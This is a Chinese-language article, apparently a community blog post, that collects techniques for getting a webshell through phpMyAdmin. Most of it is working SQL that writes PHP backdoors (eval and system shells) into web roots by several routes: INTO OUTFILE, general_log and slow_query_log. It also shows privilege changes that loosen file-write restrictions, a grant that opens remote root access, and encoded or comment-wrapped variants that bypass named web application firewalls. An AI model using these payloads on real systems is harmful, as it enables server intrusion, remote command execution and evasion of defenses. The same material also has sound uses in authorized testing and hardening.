phpMyAdmin后台Getshell总结-阿里云开发者社区

phpMyAdmin后台Getshell总结

2023-09-29 389

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

本文涉及的产品

RDS MySQL Serverless 基础系列，0.5-2RCU 50GB

云数据库 RDS MySQL，集群系列 2核4GB

Web应用防火墙 3.0，每月20元额度 3个月

简介： phpMyAdmin后台Getshell总结

0x01 前言

phpMyAdmin是一个以PHP为基础的MySQL数据库管理工具，管理者可以通过Web方式来控制和操作MySQL数据库。phpMyAdmin在MySQL和MariaDB上支持多种操作，可以直接在用户界面中执行常用操作，如：浏览/删除/创建/复制/删除/重命名和更改数据库、表、视图、字段和索引，管理MySQL用户帐户和权限等，也可以直接执行SQL语句。

0x02 Getshell常见报错

(1) #1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

show global variables like "%secure%";      //查询secure_file_priv配置
secure_file_prive=null                      //不允许导入导出数据到目录
secure_file_priv=c:\90sec                   //允许导入导出数据到指定目录
secure_file_priv=""                         //允许导入导出数据到任意目录
secure_file_priv="/"                        //允许导入导出数据到任意目录

注：在my.ini、my.cnf、mysqld.cnf文件中找到secure_file_prive并将其值设置为空""或斜杠"/"，然后重启MySQL服务即可！

(2) #1045 - Access denied for user 'root'@'localhost' (using password: YES)

select * from mysql.user;                                //查询所有用户权限
select * from mysql.user where user="root";              //查询root用户权限
update user set File_priv ='Y' where user = 'root';      //允许root用户读写文件
update user set File_priv ='N' where user = 'root';      //禁止root用户读写文件
flush privileges;

0x03 Getshell方式小结

(1) 读取/导出中文路径

load data infile 'C:\\phpStudy\\WWW\\90sec.php' into table user;
select load_file(concat('C:\\phpStudy\\WWW\\',unhex('b2e2cad4') ,'\\90sec.php'));
set character_set_client='gbk';set character_set_connection='gbk';set character_set_database='gbk';set character_set_results='gbk';set character_set_server='gbk';select '<?php eval($_POST[pass]);?>' into outfile 'C:\\phpStudy\\WWW\\测试\\90sec.php';

(2) 常规导出Webshell-1

Create TABLE shadow9 (content text NOT NULL);
Insert INTO shadow9 (content) VALUES('<?php @eval($_POST[pass]);?>');
select content from shadow9 into outfile 'C:\\phpStudy\\WWW\\90sec.php';
DROP TABLE IF EXISTS `shadow9`;

(3) 常规导出Webshell-2

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';  
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' into outfile 'C:\\phpStudy\\WWW\\90sec.php';

(4) general_log Getshell

show global variables like "%genera%";                      //查询general_log配置
set global general_log='on';                                //开启general log模式
SET global general_log_file='C:/phpStudy/WWW/cmd.php';      //设置日志文件保存路径
SELECT '<?php phpinfo();?>';                                //phpinfo()写入日志文件
set global general_log='off';                               //关闭general_log模式

注：高版本MySQL数据库中一般都默认配置了secure_file_priv变量值为null，限制了文件的导入导出，这时我们可以尝试利用MySQL的general_log和slow_query_log日志文件写入Webshell。

(5) slow_query_log_file Getshell

show variables like 'slow_query_log_file';
set global slow_query_log=on;
set global slow_query_log_file="C:\\phpStudy\\WWW\\shell.php";
select sleep(15),'<?php phpinfo();?>';
set global slow_query_log=off;

注：利用general_log或slow_query_log在成功写入Webshel后建议立即OFF关闭，否则可能会因为php.ini配置文件中的memory_limit参数设定的内存值太小而出现“内存不足”的报错。

Windows报错：

#29 - File 'C:\phpStudy\PHPTutorial\testing\cmd.php' not found (Errcode: 13)

Linux报错：

#1231 - Variable 'general_log_file' can't be set to the value of '/home/wwwroot/default/cmd.php'

出错原因：

MySQL运行用户与网站目录对应用户的写入/修改权限问题，需要给予网站目录所需权限才能解决该问题！

(6) 绕过WAF Getshell-1

phpMyAdmin导出Webshell时如果遇到WAF可能就会被拦截，因为WAF会检测我们提交的POST、GET数据包内容中是否含有危险函数、SHELL特征等，如果有则拦截，没有则放行。

这时我们可以尝试开启外链来执行导出Webshell的SQL语句，因为这样走的不是POST、GET方式，所以这样执行SQL语句是不会被WAF拦截的。

grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;    //开启MySQL外链
flush privileges;                          //刷新MySQL系统权限相关表

(7) 绕过WAF Getshell-2

检测我们提交SQL语句的POST、GET数据包中是否包含的有WAF特征库中的危险函数、SHELL特征等，如：select、outfile、eval、assert等这样的就会被拦截。

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';

绕过360网站卫士：

select '<?php @eval($_POST[pass]);?>' into /*!50001outfile*/ 'c:/phpstudy/www/bypass.php';

绕过网站安全狗（<4.0）：

select 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

注：Hex编码，提交时虽然会显示拦截，但其实[过狗马]已经被写进去了！

绕过网站安全狗（4.0正式版）：

/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

phpMyAdmin后台Getshell总结

(2) #1045 - Access denied for user 'root'@'localhost' (using password: YES)

(1) 读取/导出中文路径

(2) 常规导出Webshell-1

(3) 常规导出Webshell-2

(4) general_log Getshell

(5) slow_query_log_file Getshell

(6) 绕过WAF Getshell-1

(7) 绕过WAF Getshell-2

热门文章

最新文章

相关电子书

相关实验场景

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

phpMyAdmin后台Getshell总结

(2) #1045 - Access denied for user 'root'@'localhost' (using password: YES)

(1) 读取/导出中文路径

(2) 常规导出Webshell-1

(3) 常规导出Webshell-2

(4) general_log Getshell

(5) slow_query_log_file Getshell

(6) 绕过WAF Getshell-1

(7) 绕过WAF Getshell-2

热门文章

最新文章

相关电子书

相关实验场景